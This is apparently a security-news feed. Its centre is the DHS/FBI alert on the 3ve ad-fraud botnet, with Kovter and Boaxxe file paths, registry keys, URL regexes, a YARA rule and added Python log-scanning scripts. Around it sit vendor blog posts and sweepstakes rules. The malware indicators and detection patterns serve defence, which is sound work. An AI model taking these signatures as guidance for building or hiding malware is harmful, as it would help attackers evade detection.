Potentially disastrous Rowhammer bitflips can bypass ECC protections | Ars Technica
Bloomberg is still reporting on challenged story regarding China hardware hack - The Washington Post
Magecart group hilariously sabotages competitor | ZDNet
Amazon admits it exposed customer email addresses, but refuses to give details | TechCrunch
Google, Mozilla working on letting web apps edit files despite warning it could be 'abused in terrible ways' - TechRepublic
Germany proposes router security guidelines | ZDNet
Half of all Phishing Sites Now Have the Padlock — Krebs on Security
The Snowden Legacy, part one: What’s changed, really? | Ars Technica
QConSF18 - Canaries - Google Drive
Canary — know when it matters

Industry collaboration leads to takedown of the “3ve” ad fraud operation



For years, Google has been waging a comprehensive, global fight against invalid traffic through a combination of technology, policy, and operations teams to protect advertisers and publishers and increase transparency throughout the advertising industry.

Last year, we identified one of the most complex and sophisticated ad fraud operations we have seen to date, working with cyber security firm White Ops, and referred the case to law enforcement. Today, the U.S. Attorney’s Office for the Eastern District of New York announced criminal charges associated with this fraud operation. This takedown marks a major milestone in the industry’s fight against ad fraud, and we’re proud to have been a key contributor.

In partnership with White Ops, we have published a white paper about how we identified this ad fraud operation, the steps we took to protect our clients from being impacted, and the technical work we did to detect patterns across systems in the industry. Below are some of the highlights from the white paper, which you can download here.

All about 3ve: A creative and sophisticated threat

Referred to as 3ve (pronounced “Eve”), this ad fraud operation evolved over the course of 2017 from a modest, low-level botnet into a large and sophisticated operation that used a broad set of tactics to commit ad fraud. 3ve operated on a significant scale: At its peak, it controlled over 1 million IPs from both residential malware infections and corporate IP spaces primarily in North America and Europe.

Through our investigation, we discovered that 3ve was comprised of three unique sub-operations that evolved rapidly, using sophisticated tactics aimed at exploiting data centers, computers infected with malware, spoofed fraudulent domains, and fake websites. Through its varied and complex machinery, 3ve generated billions of fraudulent ad bid requests (i.e., ad spaces on web pages that advertisers can bid to purchase in an automated way), and it also created thousands of spoofed fraudulent domains. It should be noted that our analysis of ad bid requests indicated growth in activity, but not necessarily growth in transactions that would result in charges to advertisers. It’s also worth noting that 3+ billion daily ad bid requests made 3ve an extremely large ad fraud operation, but its bid request volume was only a small percentage of overall bid request volume across the industry.

Our objective

Trust and integrity are critical to the digital advertising ecosystem. Investments in our ad traffic quality systems made it possible for us to tackle this ad fraud operation and to limit the impact it had on our clients as quickly as possible, including crediting advertisers.

3ve’s focus, like many ad fraud schemes, was not a single player or system, but rather the whole advertising ecosystem. As we worked to protect our ad systems against traffic from this threat, we identified that others also had observed this traffic, and we partnered with them to help remove the threat from the ecosystem. The working group, which included nearly 20 partners, was a key component that shaped our broader investigation into 3ve, enabling us to engage directly with each other and to work towards a mutually beneficial outcome.

Industry collaboration helps bring 3ve down

While ad fraud traditionally has been seen as a faceless crime in which bad actors don’t face much risk of being identified or consequences for their actions, 3ve’s takedown demonstrates that there are risks and consequences to committing ad fraud. We’re confident that our collective efforts are building momentum and moving us closer to finding a resolution to this challenge.

For example, industry initiatives such as the Interactive Advertising Bureau (IAB) Tech Lab’s ads.txt standard, which has experienced and continues to see very rapid adoption (over 620,000 domains have an ads.txt), as well as the increasing number of buy-side platforms and exchanges offering refunds for invalid traffic, are valuable steps towards cutting off the money flow to fraudsters. As we announced last year, we’ve made, and will continue to make investments in our automated refunds for invalid traffic, including our work with supply partners to provide advertisers with refunds for invalid traffic detected up to 30 days after monthly billing.

Industry bodies such as the IAB, Trustworthy Accountability Group (TAG), Media Rating Council, and the Joint Industry Committee for Web Standards, who are serving as agents of change and collaboration across our industry, are instrumental in the fight against ad fraud. We have a long history of working with these bodies, including ongoing participation in TAG and IAB leadership and working groups, as well as our inclusion in the TAG Certified Against Fraud program. That program’s value was reinforced with the IAB’s requirement that all members need to be TAG certified by the middle of this year.


Successful disruption

A coordinated takedown of infrastructure related to 3ve’s operations occurred recently. The takedown involved disrupting as much of the related infrastructure as possible to make it hard to rebuild any of 3ve’s operations. As the graph below demonstrates, declining volumes in invalid traffic indicate that the disruption thus far has been successful, bringing the bid request traffic close to zero within 18 hours of starting the coordinated takedown.

Looking ahead

We’ll continue to be vigilant, working to protect marketers, publishers, and users, while continuing to collaborate with the broader industry to safeguard the integrity of the digital advertising ecosystem that powers the open web. Our work to take down 3ve is another example of our collaboration with the broader ecosystem to improve trust in digital advertising. We are committed to helping to create a better digital advertising ecosystem — one that is more valuable, transparent, and trusted for everyone.

TA18-331A: 3ve – Major Online Ad Fraud Operation

Original release date: November 27, 2018

Systems Affected

Microsoft Windows

Overview

This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). DHS and FBI are releasing this TA to provide information about a major online ad fraud operation—referred to by the U.S. Government as "3ve"—involving the control of over 1.7 million unique Internet Protocol (IP) addresses globally, when sampled over a 10-day window.

Description

Online advertisers desire premium websites on which to publish their ads and large numbers of visitors to view those ads. 3ve created fake versions of both (websites and visitors), and funneled the advertising revenue to cyber criminals. 3ve obtained control over 1.7 million unique IPs by leveraging victim computers infected with Boaxxe/Miuref and Kovter malware, as well as Border Gateway Protocol-hijacked IP addresses. 

Boaxxe/Miuref Malware

Boaxxe malware is spread through email attachments and drive-by downloads. The ad fraud scheme that utilizes the Boaxxe botnet is primarily located in a data center. Hundreds of machines in this data center are browsing to counterfeit websites. When these counterfeit webpages are loaded into a browser, requests are made for ads to be placed on these pages. The machines in the data center use the Boaxxe botnet as a proxy to make requests for these ads. A command and control (C2) server sends instructions to the infected botnet computers to make the ad requests in an effort to hide their true data center IPs.

Kovter Malware

Kovter malware is also spread through email attachments and drive-by downloads. The ad fraud scheme that utilizes the Kovter botnet runs a hidden Chromium Embedded Framework (CEF) browser on the infected machine that the user cannot see. A C2 server tells the infected machine to visit counterfeit websites. When the counterfeit webpage is loaded in the hidden browser, requests are made for ads to be placed on these counterfeit pages. The infected machine receives the ads and loads them into the hidden browser.

Impact

For the indicators of compromise (IOCs) below, keep in mind that any one indicator on its own may not necessarily mean that a machine is infected. Some IOCs may be present for legitimate applications and network traffic as well, but are included here for completeness.

Boaxxe/Miuref Malware

Boaxxe malware leaves several executables on the infected machine. They may be found in one or more of the following locations:

  • %UserProfile%\AppData\Local\VirtualStore\lsass.aaa
  • %UserProfile%\AppData\Local\Temp\<RANDOM>.exe
  • %UserProfile%\AppData\Local\<Random eight-character folder name>\<original file name>.exe

The HKEY_CURRENT_USER (HKCU) “Run” key is set to the path to one of the executables created above.

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<Above path to executable>\

Kovter Malware

Kovter malware is found mostly in the registry, but the following files may be found on the infected machine:

  • %UserProfile%\AppData\Local\Temp\<RANDOM>.exe/.bat
  • %UserProfile%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\<RANDOM>\<RANDOM FILENAME>.exe
  • %UserProfile%\AppData\Local\<RANDOM>\<RANDOM>.lnk
  • %UserProfile%\AppData\Local\<RANDOM>\<RANDOM>.bat

Kovter is known to hide in the registry under:

  • HKCU\SOFTWARE\<RANDOM>\<RANDOM>

The customized CEF browser is dropped to:

  • %UserProfile%\AppData\Local\<RANDOM>

The keys will look like random values and contain scripts. In some values, a User-Agent string can be clearly identified. An additional key containing a link to a batch script on the hard drive may be placed within registry key:

  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
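The file locations and Run-key behaviour listed above can be turned into a triage check over exported HKCU Run values. The following is an added example, not part of the original alert: the rule names, the helper functions and the sample Run values are constructed for illustration, and each `<RANDOM>` placeholder is assumed to be a single path component.

```python
import re

# Path templates from the alert, anchored at %UserProfile%\AppData\Local\.
# Targets are lower-cased before matching; SEG stands in for <RANDOM>.
LOCAL = r"%userprofile%\\appdata\\local\\"
SEG = r"[^\\]+"

PATH_RULES = {
    "boaxxe_virtualstore_lsass": re.compile(LOCAL + r"virtualstore\\lsass\.aaa"),
    "temp_exe_or_bat": re.compile(LOCAL + r"temp\\" + SEG + r"\.(exe|bat)"),
    "boaxxe_8char_dir_exe": re.compile(LOCAL + r"[^\\]{8}\\" + SEG + r"\.exe"),
    "kovter_dir_lnk_or_bat": re.compile(LOCAL + SEG + r"\\" + SEG + r"\.(lnk|bat)"),
}

# "C:\Users\<name>" is rewritten to %userprofile% so one rule set fits all users.
USER_PREFIX = re.compile(r"^[a-z]:\\users\\[^\\]+")


def run_value_target(command):
    """Extract the program path from a Run value and normalise it."""
    command = command.strip()
    if command.startswith('"'):
        path = command[1:].split('"', 1)[0]
    else:
        # Unquoted values are cut at the first whitespace; an unquoted path
        # that contains spaces is ambiguous and needs manual review.
        path = command.split(None, 1)[0] if command else ""
    return USER_PREFIX.sub("%userprofile%", path.lower(), count=1)


def triage_run_values(values):
    """Return {value name: [matching rule names]} for (name, command) pairs."""
    findings = {}
    for name, command in values:
        target = run_value_target(command)
        rules = [rule for rule, rx in PATH_RULES.items() if rx.fullmatch(target)]
        if rules:
            findings[name] = rules
    return findings


# Constructed sample of HKCU\...\CurrentVersion\Run values (name, data).
SAMPLE_RUN_VALUES = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("qwhzkxrt", r"C:\Users\alice\AppData\Local\kqzvhmtw\svchost.exe"),
    ("upd", r"%UserProfile%\AppData\Local\VirtualStore\lsass.aaa"),
    ("a1b2", r'"C:\Users\alice\AppData\Local\f3a9c1\7be2d0.bat"'),
    ("Setup", r"C:\Users\alice\AppData\Local\Temp\setup.exe /S"),
    ("Defender", r'"C:\Program Files\Windows Defender\MSASCuiL.exe"'),
]

if __name__ == "__main__":
    for name, rules in triage_run_values(SAMPLE_RUN_VALUES).items():
        print(name, rules)
```

The `Setup` entry is flagged only by the broad Temp rule, which is the kind of single indicator the alert says may also appear for legitimate software; treat each hit as a lead to review alongside the other indicators.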

There are several patterns in the network requests that are made by Kovter malware when visiting the counterfeit websites. The following are regex rules for these URL patterns:

  • /?ptrackp=\d{5,8}
  • /feedrs\d/click?feed_id=\d{1,5}&sub_id=\d{1,5}&cid=[a-f0-9-]*&spoof_domain=[\w\.\d-_]*&land_ip=\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}
  • /feedrs\d/vast_track?a=impression&feed_id=\d{5}&sub_id=\d{1,5}&sub2_id=\d{1,5}&cid=[a-f\d-]
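To apply these URL patterns to web proxy logs, the `?` that separates path from query has to be escaped so it matches literally. The following is an added example, not part of the original alert: the adapted patterns, the rule names, the five-field log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The alert's three URL patterns, adapted (assumption of this example):
# the "?" that starts the query string is escaped so it is a literal, and
# [\w\.\d-_] is written [\w.-] so the hyphen is an unambiguous literal.
KOVTER_URL_RULES = {
    "ptrackp": re.compile(r"/\?ptrackp=\d{5,8}"),
    "feedrs_click": re.compile(
        r"/feedrs\d/click\?feed_id=\d{1,5}&sub_id=\d{1,5}&cid=[a-f0-9-]*"
        r"&spoof_domain=[\w.-]*"
        r"&land_ip=\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    ),
    "feedrs_vast_track": re.compile(
        r"/feedrs\d/vast_track\?a=impression&feed_id=\d{5}&sub_id=\d{1,5}"
        r"&sub2_id=\d{1,5}&cid=[a-f\d-]"
    ),
}

# Start of the click pattern exactly as printed: "k?" makes the k optional,
# so the regex never consumes the literal "?" of a real request.
CLICK_AS_PRINTED = re.compile(r"/feedrs\d/click?feed_id=\d{1,5}")


def request_target(url):
    """Return path plus query ("/a/b?x=1") of a URL, or "" if unparsable."""
    try:
        parts = urlsplit(url)
    except ValueError:  # malformed authority, e.g. a broken IPv6 literal
        return ""
    return parts.path + ("?" + parts.query if parts.query else "")


def match_kovter_url(url):
    """Return the names of the rules that match the URL's path and query."""
    target = request_target(url)
    return [name for name, rx in KOVTER_URL_RULES.items() if rx.search(target)]


def scan_proxy_log(text):
    """Map client IP -> set of rule names, for lines of the constructed form
    '<timestamp> <client> <method> <url> <status>'."""
    hits = defaultdict(set)
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue
        _, client, _, url, _ = fields
        for name in match_kovter_url(url):
            hits[client].add(name)
    return dict(hits)


# Constructed sample log; hosts and addresses are documentation values.
SAMPLE_LOG = """\
2018-11-27T10:00:01Z 10.0.0.21 GET http://ads.example.test/?ptrackp=1234567 200
2018-11-27T10:00:02Z 10.0.0.21 GET http://ads.example.test/feedrs3/click?feed_id=101&sub_id=7&cid=ab12-cd34&spoof_domain=news.example.test&land_ip=192.0.2.10 302
2018-11-27T10:00:03Z 10.0.0.35 GET http://shop.example.test/click?feed_id=101 200
2018-11-27T10:00:04Z 10.0.0.35 GET http://cdn.example.test/feedrs1/vast_track?a=impression&feed_id=54321&sub_id=12&sub2_id=3&cid=9f8e-7d6c 200
2018-11-27T10:00:05Z 10.0.0.40 GET http://intranet.example.test/?ptrackp=12 200
2018-11-27T10:00:06Z 10.0.0.40 CONNECT mail.example.test:443 200
"""

if __name__ == "__main__":
    for client, rules in sorted(scan_proxy_log(SAMPLE_LOG).items()):
        print(client, sorted(rules))
```

Grouping hits per client shows which hosts produced more than one pattern, which matters because the alert cautions that a single indicator on its own may not mean a machine is infected.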

The following is a YARA rule for detecting Kovter:

rule KovterUnpacked {
  meta:
    desc = "Encoded strings in unpacked Kovter samples."
  strings:
    $ = "7562@3B45E129B93"
    $ = "@ouhKndCny"
    $ = "@ouh@mmEdctffdsr"
    $ = "@ouhSGQ"
  condition:
    all of them
}

Solution

If you believe you may be a victim of 3ve and its associated malware or hijacked IPs, and have information that may be useful to investigators, submit your complaint to www.ic3.gov and use the hashtag 3ve (#3ve) in the body of your complaint.

DHS and FBI advise users to take the following actions to remediate malware infections associated with Boaxxe/Miuref or Kovter:

  • Use and maintain antivirus software. Antivirus software recognizes and protects your computer against most known viruses. Security companies are continuously updating their software to counter these advanced threats. Therefore, it is important to keep your antivirus software up-to-date. If you suspect you may be a victim of malware, update your antivirus software definitions and run a full-system scan. (See Understanding Anti-Virus Software for more information.)
  • Avoid clicking links in email. Attackers have become very skilled at making phishing emails look legitimate. Users should ensure the link is legitimate by typing the link into a new browser. (See Avoiding Social Engineering and Phishing Attacks.)
  • Change your passwords. Your original passwords may have been compromised during the infection, so you should change them. (See Choosing and Protecting Passwords.)
  • Keep your operating system and application software up-to-date. Install software patches so that attackers cannot take advantage of known problems or vulnerabilities. You should enable automatic updates of the operating system if this option is available. (See Understanding Patches and Software Updates for more information.)
  • Use anti-malware tools. Using a legitimate program that identifies and removes malware can help eliminate an infection. Users can consider employing a remediation tool. A non-exhaustive list of examples is provided below. The U.S. Government does not endorse or support any particular product or vendor.

Revision History

  • November 27, 2018: Initial version



Happy National Day of Giving!

Today is National Day of Giving. How are you celebrating?

At Verisign, we did a quick search on NameStudio™, our easy-to-use, domain name suggestion tool to see what interesting .com and .net domain names were available to register today … and here are some of our favorites!

AVAILABLE .COM AND .NET DOMAIN NAMES*

.COM

onekindaction.com
thesharingme.com
truegivingnow.com
philanthropyfamily.com
whatsmycharity.com
donatingwithheart.com
ourfavoritegift.com
servingofkindness.com
sharedgenerosity.com
realdifferencemaker.com

.NET

onekindaction.net
thesharingme.net
truegivingnow.net
philanthropyfamily.net
whatsmycharity.net
donatingwithheart.net
ourfavoritegift.net
servingofkindness.net
sharedgenerosity.net
realdifferencemaker.net

 

What’s yours?

Tell us what great .com and .net domain names you’ve found on NameStudio here.

And check back soon to see what day we’re celebrating next. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.

Happy National Day of Giving!


*Available as of November 27, 2018

The user is solely responsible for ensuring that the registration of any domain name listed herein or based on NameStudio domain search data does not violate any third-party trademarks or other intellectual property.

The post Happy National Day of Giving! appeared first on Verisign Blog.

Retailers Fix Software Flaws Quickly, Despite Continued Code Quality Issues

Veracode State of Software Security 2018 Retail Industry

The 2018 holiday shopping season is off to a record-breaking start, thanks to consumers’ growing comfort with making online purchases and an increasing number of retailers offering Black Friday pricing starting on Thanksgiving. In fact, in the first two days of the shopping season, online retailers saw nearly $10 billion in sales, with Adobe reporting that consumers in the U.S. alone spent $6.2 billion on Black Friday. For many, the ability to complete holiday shopping online and avoid crowded parking lots and throngs of people in a shopping center or mall is a relief. This may even trump any concerns they may have about privacy or fraud as they use credit cards and apps to make their purchases.

Retail’s State of Software Security Receives High Marks – Yet There’s More to be Done

The good news is Veracode’s State of Software Security Volume 9 (SOSS Vol. 9) found that retail is faster than most industries – second only to healthcare – when it comes to addressing common vulnerabilities found in software, thereby reducing risk exposure. Through our flaw persistence analysis, or how long a flaw lingers after first discovery, we found that the retail industry remediates a quarter of its vulnerabilities in 14 days, and 50 percent of flaws in 64 days. Retail outpaced the average fix speed at every interval across all industries, keeping consistent with its urgency to close vulnerabilities.

However, two-thirds (66 percent) of applications retailers use are at risk from information leakage attacks. This means that an application may reveal sensitive data that an attacker can then use to exploit the web application, its hosting network, or the user. Retail reported the third-most information leakage issues after technology and financial services. SOSS Vol. 9 also shows that the retail industry has the highest number of code quality flaws when compared to all other verticals at 65 percent. Code quality is the third most common vulnerability category across the board, following information leakage and cryptographic issues, suggesting that developing quality, secure code is an industry-wide issue for the retail sector.

“Vulnerabilities in applications can allow attackers seeking sensitive information such as consumer payment data a way in,” said Paul Farrington, Director of EMEA and APJ at Veracode. “Many retailers are showing an aptitude for remediating flaws quickly to help improve security and protect their high value information. This is promising, yet the persistence and prevalence of vulnerabilities that continues to plague retailers calls for both increased speed of fix and better prioritizing which flaws to fix first.”

Secure Software Development Education and the Skills Gap

It is estimated 3.5 million cybersecurity jobs will go unfilled by the year 2020. Our research shows 76 percent of developers say that security and secure development education is necessary – but not offered in current curriculums – so this hardly comes as a surprise. The onus falls on organizations such as retailers to ensure that their development teams are receiving the education necessary, and are equipped with the appropriate tooling, to make security a priority in the software development process.

As the retail industry offers new ways to buy, pick up, and ship goods, it is also increasing the threat landscape by producing a wider portfolio of web applications. It will be critical for them to ensure their developers have what they need to keep their systems and their customers’ sensitive information safe from potential cyber attacks.

To learn more about the retail industry’s security hygiene, download the free Retail Industry Infosheet.

2018 Cost of Data Breach vs. Cybersecurity Response Plans and Solutions

Data breaches cost businesses millions in damages and can seriously tarnish their reputation. Find out how to protect your enterprise from a costly breach with data security solutions and cyber threat intelligence.



Is a Laptop’s Password Enough to Keep it Secure?

It could happen to any of us. One minute your laptop is sitting on a coffeehouse table or going through airport security, the next it’s gone. Your personal files are all locked behind a strong password, but is that enough to keep off prying eyes?

In episode 19 of “Hackable?”, Geoff ships his laptop 1,000 miles to a white-hat hacker to investigate. Listen and learn if his password is enough, or if Geoff’s tax forms, social security number, and photos are compromised. 

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this surprising episode.  


Author: Gary Davis. Published: Monday 26 Nov 2018 12:35:48 +0000.

The post Is a Laptop’s Password Enough to Keep it Secure? appeared first on McAfee Blogs.

Stay Secure and Your Wallet Full with Our Holiday Shopping #RT2Win Sweepstakes!

Black Friday and Cyber Monday mark the unofficial kickoff to the holiday shopping season. In anticipation of the busiest time of year for e-commerce, this year we conducted the Stressed Holiday Online Shopping survey to understand how financial pressure can impact buyer behavior when it comes to online purchasing and cybersecurity.

The economic burden of the holidays is something consumers know all too well. From gifts for the family to parties with friends, it’s no wonder that 79 percent of survey respondents said that holiday shopping puts financial stress on them. And the stress of stretching that budget led 53 percent of respondents to say they can be careless when online shopping. Further, more than half of consumers (56 percent) said that they would use a website they were unfamiliar with if it meant they would save money.

But just in time for holiday shopping season, we’re here to help take the financial burden off your shoulders with our Holiday Shopping RT2Win Sweepstakes! Two [2] lucky winners of the sweepstakes drawing will receive a $500 Amazon gift card. The best part? Entering is a breeze! Follow the instructions below to enter and good luck!

#RT2Win Sweepstakes Official Rules

  • To enter, follow @McAfee_Home on Twitter and find the #RT2Win sweepstakes tweet.
  • The sweepstakes tweet will be released on Monday, November 26, 2018 at 12:00pm PT. This tweet will include the hashtags: #ProtectWhatMatters, #RT2Win AND #Sweepstakes.
  • Retweet the sweepstakes tweet released on the above date, from your own handle. The #ProtectWhatMatters, #RT2Win AND #Sweepstakes hashtags must be included to be entered.
  • Make sure you’re following @McAfee_Home on Twitter! You must follow for your entry to count.
  • Sweepstakes will end on Sunday, December 9, 2018 at 11:59pm PT. All entries must be made before that date and time.
  • Winners will be notified on Tuesday, December 11, 2018 via Twitter direct message.
  • Limit one entry per person.

1. How to Win:

Retweet one of our contest tweets on @McAfee_Home that include “#ProtectWhatMatters, #RT2Win, AND #Sweepstakes” for a chance to win a $500 Amazon gift card (for full prize details please see “Prizes” section below). Two [2] total winners will be selected and announced on December 10, 2018. Winners will be notified by direct message on Twitter. For full Sweepstakes details, please see the Terms and Conditions, below.

#RT2Win Sweepstakes Terms and Conditions

2. How to Enter: 

No purchase necessary. A purchase will not increase your chances of winning. McAfee Holiday Shopping #RT2Win Sweepstakes will be conducted from November 26, 2018 through December 9, 2018. All entries for each day of the McAfee Holiday Shopping #RT2Win Sweepstakes must be received during the time allotted for the McAfee Holiday Shopping #RT2Win Sweepstakes. Pacific Daylight Time shall control the McAfee Holiday Shopping #RT2Win Sweepstakes, duration is as follows:

  • Begins: Monday, November 26, 2018 at 12:00pm PST
  • Ends: Sunday, December 9, 2018 at 11:59pm PST
  • Two [2] winners will be announced: Tuesday, December 11, 2018

For the McAfee Holiday Shopping #RT2Win Sweepstakes, participants must complete the following steps during the time allotted for the McAfee Holiday Shopping #RT2Win Sweepstakes:

  1. Follow @McAfee_Home on Twitter.
  2. Find the sweepstakes tweet of the day posted on @McAfee_Home which will include the hashtags: #ProtectWhatMatters, #RT2Win and #Sweepstakes.
  3. Retweet the sweepstakes tweet of the day and make sure it includes the #ProtectWhatMatters, #RT2Win, and #Sweepstakes hashtags.
  4. Note: Tweets that do not contain the #ProtectWhatMatters, #RT2Win, and #Sweepstakes hashtags will not be considered for entry.
  5. Limit one entry per person.

Two [2] winners will be chosen for the McAfee Holiday Shopping #RT2Win Sweepstakes tweet from the viable pool of entries that retweeted and included #ProtectWhatMatters, #RT2Win and #Sweepstakes. McAfee and the McAfee social team will choose winners from all the viable entries. The winners will be announced and privately messaged on Tuesday, December 11, 2018 on the @McAfee_Home Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per Sweepstakes.   

3. Eligibility: 

McAfee Holiday Shopping #RT2Win Sweepstakes is open to all legal residents of the 50 United States who are 18 years of age or older on the date the McAfee Holiday Shopping #RT2Win Sweepstakes begins and live in a jurisdiction where this prize and the McAfee Holiday Shopping #RT2Win Sweepstakes are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

4. Winner Selection:

Winners will be selected at random from all eligible retweets received during the McAfee Holiday Shopping #RT2Win Sweepstakes drawing entry period. Sponsor will select the names of two [2] potential winners of the prizes in a random drawing from among all eligible submissions at the address listed below. The odds of winning depend on the number of eligible entries received. By participating, entrants agree to be bound by the Official McAfee Holiday Shopping #RT2Win Sweepstakes Rules and the decisions of the coordinators, which shall be final and binding in all respects.

5. Winner Notification:  

Each winner will be notified via direct message (“DM”) on Twitter.com by December 11, 2018. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited, and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty-four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

6. Prizes: 

The prize for the McAfee Holiday Shopping #RT2Win Sweepstakes is a $500 Amazon gift card for each of the two [2] entrants/winners. Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Holiday Shopping #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Holiday Shopping #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor. Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

Limit one (1) prize per person/household. Prizes are non-transferable, and no cash equivalent or substitution of prize is offered. The McAfee Holiday Shopping #RT2Win Sweepstakes has no affiliation with Amazon.

7. General Conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner. Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Holiday Shopping #RT2Win Sweepstakes, or by any technical or human error, which may occur in the processing of the McAfee Holiday Shopping #RT2Win Sweepstakes entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the McAfee Holiday Shopping #RT2Win Sweepstakes, any prize won, any misuse or malfunction of any prize awarded, participation in any McAfee Holiday Shopping #RT2Win Sweepstakes-related activity, or participation in the McAfee Holiday Shopping #RT2Win Sweepstakes. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

8. Limitations of Liability; Releases:

By entering the Sweepstakes, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Sweepstakes or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

To the fullest extent permitted by applicable law, in no event will the sponsor or the released parties be liable for any special, indirect, incidental, or consequential damages, including loss of use, loss of profits or loss of data, whether in an action in contract, tort (including, negligence) or otherwise, arising out of or in any way connected to your participation in the sweepstakes or use or inability to use any equipment provided for use in the sweepstakes or any prize, even if a released party has been advised of the possibility of such damages.

  • To the fullest extent permitted by applicable law, in no event will the aggregate liability of the released parties (jointly) arising out of or relating to your participation in the sweepstakes or use of or inability to use any equipment provided for use in the sweepstakes or any prize exceed $10. The limitations set forth in this section will not exclude or limit liability for personal injury or property damage caused by products rented from the sponsor, or for the released parties’ gross negligence, intentional misconduct, or for fraud.
  • Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Sweepstakes constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Sweepstakes, you consent to being contacted by Sponsor for any purpose in connection with this Sweepstakes.

9. Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with the prize McAfee Holiday Shopping #RT2Win Sweepstakes rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each McAfee Holiday Shopping #RT2Win Sweepstakes.

10. Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the McAfee Holiday Shopping #RT2Win Sweepstakes and all matters or disputes arising from the McAfee Holiday Shopping #RT2Win Sweepstakes and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

11. Governing Law & Disputes:

Each entrant agrees that any disputes, claims, and causes of action arising out of or connected with these sweepstakes or any prize awarded will be resolved individually, without resort to any form of class action and these rules will be construed in accordance with the laws, jurisdiction, and venue of the State of New York, U.S.A.

12. Privacy Policy: 

Personal information obtained in connection with this prize McAfee Holiday Shopping #RT2Win Sweepstakes will be handled in accordance with the policy set forth at http://www.mcafee.com/us/about/privacy.html.

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after November 26, 2018 before December 9, 2018, to the address listed below, Attn: #RT2Win at CES Sweepstakes. To obtain a copy of these Official Rules, visit this link or send a stamped, self-addressed business-size envelope to the address listed below, Attn: Sarah Grayson. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Sweepstakes and all accompanying materials are copyright © 2018 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters 2821 Mission College Blvd. Santa Clara, CA 95054 USA
  4. Administrator: LEWIS Pulse, 111 Sutter St., Suite 850, San Francisco, CA 94104

The post Stay Secure and Your Wallet Full with Our Holiday Shopping #RT2Win Sweepstakes! appeared first on McAfee Blogs.

Are You Sharing in this Cyberwarfare?

If your organization is, you can win on a couple fronts…

In traditional warfare, information sharing is key. The notion of sharing insight on your opponent is extremely valuable and cannot be underestimated. The basic principles in Sun Tzu’s The Art of War state you must know yourself and know your opponent to be successful. Cyberwarfare is no different. Information is obtained and exchanged to gain the upper hand. Translating to cybersecurity, you must know your vulnerabilities; understand the attackers’ tactics; and leverage a vulnerability (system or user), deception, hiding tactics, and strike efforts at an unexpected time and location. Sharing this insight is crucial to establishing detection and protection strategies. Just start with your current infrastructure sharing insight. Imagine your IT and security functions working together to protect your environment. Consider if critical vulnerability information is shared with your endpoint security or if network security blocks suspicious users or devices to detect and confine highly vulnerable devices. Maximizing your IT infrastructure to coordinate efforts will deter the creative attacker.

Basics of cybersharing

Cybersharing discussions begin with essential cybersharing framework components that address the why and the what:

  • Identify the problem to be solved
  • List the functions or products involved
  • Simply describe what you want to happen
  • Map these actions to one of four key capabilities (receive an event, ask a question, take action, and publish an event)

